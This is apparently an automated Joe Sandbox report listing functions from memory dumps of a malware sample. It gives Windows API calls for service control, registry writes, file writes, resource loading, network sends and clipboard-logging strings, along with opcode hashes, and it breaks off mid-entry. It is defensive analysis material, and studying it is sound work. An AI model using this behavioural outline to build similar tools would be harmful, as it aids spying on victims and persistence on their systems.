Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction ID: 0385b83de79b7bb6cb4bcf07db30d589a9567276a82924e6c2308b386e5243d8
Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction Fuzzy Hash: 39F0C231580218ABD611AF649C48EBF3B6CDF45A61F000025FE09A2181DF38DE059AB8

Function 0214AD0D Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 0214AD1C
OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 0214AD30
CloseServiceHandle.ADVAPI32(00000000), ref: 0214AD3D
ControlService.ADVAPI32(00000000,00000001,?), ref: 0214AD4C

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction ID: 3df08c9f4d29349a0256293514b7d208bce8013333ff82ceaf40170913948da0
Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction Fuzzy Hash: 6AF0C231580318AFD6216B249C88EFF3B6CDF45A62F000025FD0992182DF24CD4599A4

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004193F0
GetSystemMetrics.USER32(0000004D), ref: 004193F6
GetSystemMetrics.USER32(0000004E), ref: 004193FC
GetSystemMetrics.USER32(0000004F), ref: 00419402

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Function 0214ACB1 Relevance: 6.0, APIs: 4, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0214A907,00000000), ref: 0214ACBA
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0214A907,00000000), ref: 0214ACCF
CloseServiceHandle.ADVAPI32(00000000,?,0214A907,00000000), ref: 0214ACDC
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0214A907,00000000), ref: 0214ACE7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseHandleManagerStart
String ID:
API String ID: 2553746010-0
Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction ID: 49c71e3813bd24924431f4dd9ba11423464578d283f93febdcf7306e58bd6900
Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction Fuzzy Hash: 96F0E271181328AFD2116B209D98DBF2B6CDF85AA2B010829FD05920908F68CD49A9B5

Function 0213534B Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 02135387
SetEvent.KERNEL32(?), ref: 02135393
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0213539E
CloseHandle.KERNEL32(?), ref: 021353A7

Part of subcall function 0214B756: GetLocalTime.KERNEL32(00000000), ref: 0214B770

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID:
API String ID: 2993684571-0
Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction ID: e180041365f2053caf7d90e56541e9a421bb9ffa967c1ff72164539aeb81b904
Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction Fuzzy Hash: 30F0B471984350BFDB123774CD0AA7B7F96AB0A751F010969F882816A1DBB1CC44CB96

Function 0214CFBF Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5), ref: 0214CFC9
GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 0214CFD6
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0214CFE3
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0214CFF6

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID:
API String ID: 3024135584-0
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 6ebd86d9d93091e869490a76feecf5e93c15de59e8e69972b99aa4c9f5fc77ba
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: 33E0DF7290031AEBE30027B5EC8DCAB7B7CE784B23B000266FA12801C3AA248C00C6B5

Function 0214B70F Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(0046CA14,0000000A,00000000), ref: 0214B720
LoadResource.KERNEL32(00000000,?,?,0213F645,00000000), ref: 0214B734
LockResource.KERNEL32(00000000,?,?,0213F645,00000000), ref: 0214B73B
SizeofResource.KERNEL32(00000000,?,?,0213F645,00000000), ref: 0214B74A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: dc5238ba7745da8e2dced58d1d79c7ff06c8f7d3f10ec06b57c97bf30d821710
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 03E01A36600B62EBEB211BA5AC8CE463F29F7C97677110074FA0696631CB75C840DBA8

Function 02169198 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02169198
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0216919D
___vcrt_initialize_locks.LIBVCRUNTIME ref: 021691A2

Part of subcall function 0216A6A1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0216A6B2

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 021691B7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 651bbb07792ffcc778d89c4bb4d63db33c10f0857e7628d11b4df1579e5bd6cf
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: E1C04C444D41005F2C103A70512C2BD53830C827E47A050C0CD9237605CF2A457A5DB2

Function 0216B977 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0216BAE3

Strings

-, xrefs: 0216BA13
+, xrefs: 0216BA20

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: ccc0f60e6ecb5dc19db79c0f04d5219b2fc5ea864a288e33c058e30487f75bb6
Instruction ID: 70e36d6c0631a9c8b1ddfec4bddb2e82de3eb39e3cad891e5e6eb5ea0930514e
Opcode Fuzzy Hash: ccc0f60e6ecb5dc19db79c0f04d5219b2fc5ea864a288e33c058e30487f75bb6
Instruction Fuzzy Hash: E091E5709882599ECF34CE68C8586FDBBB1AF45328F18825AD871F7294D3318B22CB51

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Function 021342B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 021342CD

Part of subcall function 0214BBDF: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,021342E3), ref: 0214BC06

Part of subcall function 021487CF: CloseHandle.KERNEL32(0213435C,?,?,0213435C,00465E74), ref: 021487E5
Part of subcall function 021487CF: CloseHandle.KERNEL32(t^F,?,?,0213435C,00465E74), ref: 021487EE

Part of subcall function 0214C6EC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C705

Sleep.KERNEL32(000000FA,00465E74), ref: 0213439F

Strings

0NG, xrefs: 021342FE

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: 0NG
API String ID: 368326130-1567132218
Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction ID: a8d62a69a6b9563c1fd3d0b3b8cc77e5c0c622af664a130359020b482c2a4a1e
Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction Fuzzy Hash: F9315431A902185FCB16FBB4EC95DEE777BAF90310F400169E90AA7194EF305E4ACE91

Function 02148CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02148D25
SHCreateMemStream.SHLWAPI(00000000), ref: 02148D72

Strings

image/jpeg, xrefs: 02148D3C

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/jpeg
API String ID: 1369699375-3785015651
Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
Instruction ID: c8270ad2069047905846579948a08b03a3f2d09de0286d04111bf9c0ed397f2e
Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
Instruction Fuzzy Hash: 17314B72544310AFC301AF64CC84D7FBBEAFF8A710F004A2EF98997251DB7599058BA2

Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE

Part of subcall function 00418656: 73B42440.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A

SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B

Part of subcall function 004186CB: 73B5EFB0.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD

Part of subcall function 00418679: 73B65080.GDIPLUS(?,00418B82), ref: 00418682

Strings

image/jpeg, xrefs: 00418AD5

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateStream$B42440B65080
String ID: image/jpeg
API String ID: 3716329631-3785015651
Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6

Function 02181D9E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02181FF9,?,00000050,?,?,?,?,?), ref: 02181E79

Strings

ACP, xrefs: 02181DBC
OCP, xrefs: 02181DF2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: d608edd7a4ce71796f1364d36f53874fd21be2790aacad2256054d4e51c24190
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BD21F863AC0105BAE73AAB54C984BEB73ABAB40B55F264920ED1DD7200F772D942CB50

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[Text copied to clipboard], xrefs: 0040B7E6
[End of clipboard], xrefs: 0040B7D9

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 997b23da0492a954ba0c2077d452a188f97c6a6b4ba82b36ee8ab04a6d486657
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: 997b23da0492a954ba0c2077d452a188f97c6a6b4ba82b36ee8ab04a6d486657
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

OCP, xrefs: 00451B8B
ACP, xrefs: 00451B55

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

Function 0217B998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0217BDD5,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0217BA42
GetLastError.KERNEL32 ref: 0217BA6B

Strings

PkGNG, xrefs: 0217B99A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction ID: e39b2bf1ca96b54090c3d047383d3f11aa6a613079eb3f44f24943f5deebf1a3
Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction Fuzzy Hash: E7318F71A00219DFCB24DF59CC80AD9B3F5FF88315F1085AAE51AD7260E730AA81CB54

Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
GetLastError.KERNEL32 ref: 0044B804

Strings

PkGNG, xrefs: 0044B733

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68

Function 0214654B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0214655C

Part of subcall function 02143ADE: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 02143AEC
Part of subcall function 02143ADE: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0213C3B9,00466C48,00000001,000000AF,004660A4), ref: 02143B07
Part of subcall function 02143ADE: RegCloseKey.ADVAPI32(004660A4,?,?,?,0213C3B9,00466C48,00000001,000000AF,004660A4), ref: 02143B12

Part of subcall function 0213A04B: _wcslen.LIBCMT ref: 0213A064

Strings

!D@, xrefs: 021472F0
PG, xrefs: 02146589

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$PG
API String ID: 3411444782-1987221222
Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction ID: 42222199d77473e9881b9cf15a05611ee56978cb136939daf8f86af82a7be8d0
Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction Fuzzy Hash: F611AF607C42515FDA1A7770AC20BBD2287EB91300F50882EFA4A8F2D4EFB95C45AE59

Function 0217B8B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0217BDF5,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0217B954
GetLastError.KERNEL32 ref: 0217B97D

Strings

PkGNG, xrefs: 0217B8BB

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction ID: ca1ab4bdc853414a7a4c217f39bc202890b042d9b941721445f48c7ca551fc0e
Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction Fuzzy Hash: DC218D75A04219DFCB15CF59C880AE9B3F9EB4831AF1044AEE95AD7251D730AE85CF60

Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
GetLastError.KERNEL32 ref: 0044B716

Strings

PkGNG, xrefs: 0044B654

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64

Function 02148DF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02148E11
SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 02148E36

Strings

image/png, xrefs: 02148E28

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/png
API String ID: 1369699375-2966254431
Opcode ID: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
Instruction ID: f018d9dc1c4b5a1c723a225cab2321ba5a93174dd928ddc8e26ce7800f25194f
Opcode Fuzzy Hash: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
Instruction Fuzzy Hash: BE219D31240211AFC205AB60CC88CBFBBAEEFCA750B10052DF94A83210DB3499458BA2

Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA

Part of subcall function 00418656: 73B42440.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A

SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF

Part of subcall function 004186CB: 73B5EFB0.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD

Part of subcall function 00418679: 73B65080.GDIPLUS(?,00418B82), ref: 00418682

Strings

image/png, xrefs: 00418BC1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateStream$B42440B65080
String ID: image/png
API String ID: 3716329631-2966254431
Opcode ID: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
Opcode Fuzzy Hash: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6

Function 0213486E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02134873

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

NG, xrefs: 021348C1
}E, xrefs: 0213486E

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

